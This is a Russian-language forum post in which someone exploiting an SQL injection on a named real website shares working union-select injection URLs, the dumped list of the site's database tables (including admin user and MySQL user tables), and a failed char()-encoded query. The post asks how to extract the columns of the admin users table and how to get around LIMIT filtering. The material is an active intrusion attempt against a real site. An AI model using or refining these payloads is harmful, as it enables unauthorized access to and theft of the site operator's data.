Итак есть иньекция в 5 версии мускула
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES
имена таблиц выводит, используем limit тоесть
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES+limit+1,1 итд
Дальше хочется узнать в каких таблицах какие колонки вот список всех таблиц

CHARACTER_SETS - 0
COLLATIONS - 1
COLLATION_CHARACTER_SET_APPLICABILITY - 2
COLUMNS - 3
COLUMN_PRIVILEGES - 4
KEY_COLUMN_USAGE - 5
PROFILING - 6
ROUTINES - 7
SCHEMATA - 8
SCHEMA_PRIVILEGES - 9
STATISTICS - 10
TABLES - 11
TABLE_CONSTRAINTS - 12
TABLE_PRIVILEGES - 13
TRIGGERS - 14
USER_PRIVILEGES - 15
VIEWS - 16
phpdig_clicks - 17
phpdig_engine - 18
phpdig_excludes - 19
phpdig_includes - 20
phpdig_keywords - 21
phpdig_logs - 22
phpdig_site_page - 23
phpdig_sites - 24
phpdig_spider - 25
phpdig_tempspider - 26
tbl_administered_price_workflow - 27
tbl_ex_ante_ex_post_workflow - 28
tbl_marginal_plants_workflow - 29
tbl_mrr_workflow - 30
tbl_projection - 31
tbl_rtd_e_workflow - 32
tbl_rtd_o_workflow - 33
tbl_rtx_e_workflow - 34
tbl_rtx_o_workflow - 35
tbl_vsaa_rtd_e_workflow - 36
tbl_vsaa_rtd_o_workflow - 37
tbl_wap_e_workflow - 38
tbl_wap_o_workflow - 39
tbladmin_links - 40
tbladmin_userlevel_links - 41
tbladmin_userlevels - 42
tbladmin_users - 43
tblannouncement - 44
tblannouncement_logs - 45
tblapproval - 46
tblcalendar_categories - 47
tblcalendar_events - 48
tblcategory - 49
tblcomments - 50
tblconfig - 51
tblcountry - 52
tbldailymarketupdate - 53
tbldailymarketupdate_download - 54
tbldata_graph - 55
tbldepartment - 56
tbldepartment_admin_users - 57
tbldepartment_bak - 58
tbldept_pages - 59
tbldocument - 60
tbldocument_download - 61
tbldocument_logs - 62
tbldownloads - 63
tbldownloads_logs - 64
tbleventcat - 65
tbleventcodes - 66
tblevents - 67
tbleventspeakers - 68
tblgovcalendar_categories - 69
tblgovcalendar_meetings - 70
tblgraph_html - 71
tblimghead - 72
tbllayouts - 73
tbllogs - 74
tblmag_dmi - 75
tblmag_dmi_logs - 76
tblmag_mmi - 77
tblmag_mmi_logs - 78
tblmag_wmi - 79
tblmag_wmi_logs - 80
tblmarket_monitoring_and_assessment - 81
tblmarketindex - 82
tblmarketindex_logs - 83
tblmaster_topics - 84
tblmaster_workflow - 85
tblmembership - 86
tblmessage - 87
tblmessage_copy - 88
tblmonthlysummary_report - 89
tblmustrununit_reports - 90
tblnews - 91
tblnews_logs - 92
tblnewsletter - 93
tblp_wk_opd - 94
tblp_wk_opd_logs - 95
tblpages - 96
tblparticipant - 97
tblpostdispatch_report - 98
tblprevweekreport_luzon - 99
tblprivileges - 100
tblrandom_page_side_messages - 101
tblref_workflow - 102
tblsub_workflow - 103
tblsubscribers - 104
tblsubscribers_topics - 105
tbltype_privilege - 106
tbluser_type - 107
tbluser_type_admin_users - 108
columns_priv - 109
db - 110
func - 111
help_category - 112
help_keyword - 113
help_relation - 114
help_topic - 115
host - 116
proc - 117
procs_priv - 118
tables_priv - 119
time_zone - 120
time_zone_leap_second - 121
time_zone_name - 122
time_zone_transition - 123
time_zone_transition_type - 124
user - 125
wesm_forum_acl_groups - 126
wesm_forum_acl_options - 127
wesm_forum_acl_roles - 128
wesm_forum_acl_roles_data - 129
wesm_forum_acl_users - 130
wesm_forum_attachments - 131
wesm_forum_banlist - 132
wesm_forum_bbcodes - 133
wesm_forum_bookmarks - 134
wesm_forum_bots - 135
wesm_forum_config - 136
wesm_forum_confirm - 137
wesm_forum_disallow - 138
wesm_forum_drafts - 139
wesm_forum_extension_groups - 140
wesm_forum_extensions - 141
wesm_forum_forums - 142
wesm_forum_forums_access - 143
wesm_forum_forums_track - 144
wesm_forum_forums_watch - 145
wesm_forum_groups - 146
wesm_forum_icons - 147
wesm_forum_lang - 148
wesm_forum_log - 149
wesm_forum_moderator_cache - 150
wesm_forum_modules - 151
wesm_forum_poll_options - 152
wesm_forum_poll_votes - 153
wesm_forum_posts - 154
wesm_forum_privmsgs - 155
wesm_forum_privmsgs_folder - 156
wesm_forum_privmsgs_rules - 157
wesm_forum_privmsgs_to - 158
wesm_forum_profile_fields - 159
wesm_forum_profile_fields_data - 160
wesm_forum_profile_fields_lang - 161
wesm_forum_profile_lang - 162
wesm_forum_ranks - 163
wesm_forum_reports - 164
wesm_forum_reports_reasons - 165
wesm_forum_search_results - 166
wesm_forum_search_wordlist - 167
wesm_forum_search_wordmatch - 168
wesm_forum_sessions - 169
wesm_forum_sessions_keys - 170
wesm_forum_sitelist - 171
wesm_forum_smilies - 172
wesm_forum_styles - 173
wesm_forum_styles_imageset - 174
wesm_forum_styles_imageset_data - 175
wesm_forum_styles_template - 176
wesm_forum_styles_template_data - 177
wesm_forum_styles_theme - 178
wesm_forum_topics - 179
wesm_forum_topics_posted - 180
wesm_forum_topics_track - 181
wesm_forum_topics_watch - 182
wesm_forum_user_group - 183
wesm_forum_users - 184
wesm_forum_warnings - 185
wesm_forum_words - 186
wesm_forum_zebra - 187
Я использовал вот такой запрос
http://www.wesm.ph/page.php?p=-7+union+select+COLUMN_NAME%20FROM%20INFORMATION_SC HEMA.COLUMNS+WHERE+TABLE_NAME=char%2839,116,98,108 ,97,100,109,105,110,95,117,115,101,114,115,39%29
Но он не прокатил, вапрос как мне вывести все столбцы таблицы,
и вот еще иногда limit не проходит, какая есть ему альтернатива ???
Заранее спсб